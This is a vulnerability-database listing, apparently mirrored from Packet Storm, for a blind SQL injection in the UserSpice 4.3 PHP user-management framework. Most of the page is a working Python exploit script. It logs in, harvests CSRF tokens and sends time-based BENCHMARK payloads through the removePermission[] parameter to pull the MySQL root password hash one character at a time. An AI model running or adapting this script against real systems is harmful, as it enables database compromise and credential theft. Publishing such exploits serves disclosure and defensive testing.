Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

UserSpice 4.3 Blind SQL Injection

🗓️ 16 Feb 2018 00:00:00Reported by Dolev FarhiType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 31 Views

UserSpice 4.3 Blind SQL Injection exploit on userspice.com for PHP user management. Unsantized input passed to removePermission parameter.

Code
`#!/usr/env/python  
"""  
Application UserSpice PHP user management  
Vulnerability UserSpice <= 4.3 Blind SQL Injection exploit  
URL https://userspice.com  
Date 1.2.2018  
Author Dolev Farhi  
  
About the App:  
What makes userspice different from almost any other PHP User Management  
Framework is that it has been designed from the  
beginning to get out of your way so you can spend your time working on  
your project  
  
About the vulnerability:  
Unsanitized input passed to removePermission parameter.  
"""  
  
import requests  
import string  
import sys  
  
from bs4 import BeautifulSoup  
  
userspice_host = '10.0.0.16'  
userspice_user = 'admin'  
userspice_pass = 'password'  
userspice_login_url = 'http://%s//users/login.php' % userspice_host  
userspice_vuln_url = 'http://%s/users/admin_page.php?id=75' %  
userspice_host  
guess_chars = string.ascii_lowercase + string.ascii_uppercase +  
string.digits + string.punctuation  
  
  
banner = """  
-------------------------------------------------------  
| userSpice <= 4.3 Blind SQL Injection Vulnerability" |  
-------------------------------------------------------  
"""  
  
login_data = {  
'dest':'',  
'username':userspice_user,  
'password':userspice_pass  
}  
  
payload = {  
'process':'1',  
'removePermission[]':'1',  
'private':'Yes',  
'changeTitle':''  
}  
  
s = requests.session()  
  
def getCSRF(url):  
req = s.get(url).text  
soup = BeautifulSoup(req, "lxml")  
csrf = soup.find('input', {"name" : "csrf"})  
csrf_token = csrf['value']  
return csrf_token  
  
login_data_csrf = getCSRF(userspice_login_url)  
login_data['csrf'] = login_data_csrf  
req = s.post(userspice_login_url, data=login_data)  
  
if 'login failed' in req.text.lower():  
print('Login failed, check username/password')  
sys.exit(1)  
  
payload_data_csrf = getCSRF(userspice_vuln_url)  
payload['csrf'] = payload_data_csrf  
print(banner)  
print('[+] Running...')  
print('[+] Obtaining MySQL root hash... this may take some time.')  
password = ""  
for i in range(0, 61):  
for c in guess_chars:  
payload_data_csrf = getCSRF(userspice_vuln_url)  
payload['csrf'] = payload_data_csrf  
injection = "5); SELECT 1 UNION SELECT IF(BINARY  
SUBSTRING(password,{0},1)='{1}',BENCHMARK(3000000,SHA1(1)),0) Password  
FROM mysql.user WHERE User = 'root'#;".format(i, c)  
payload['removePermission[]'] = injection  
req = s.post(userspice_vuln_url, data=payload).elapsed.total_seconds()  
if float(req) 0.6:  
password += c  
print('[+] %s' % password)  
else:  
pass  
  
print('done')  
sys.exit(0)  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
16 Feb 2018 00:00Current
7.1High risk
Vulners AI Score7.1
userspiceblind sql injectionuserspice.comphpuser managementunsanitized input
31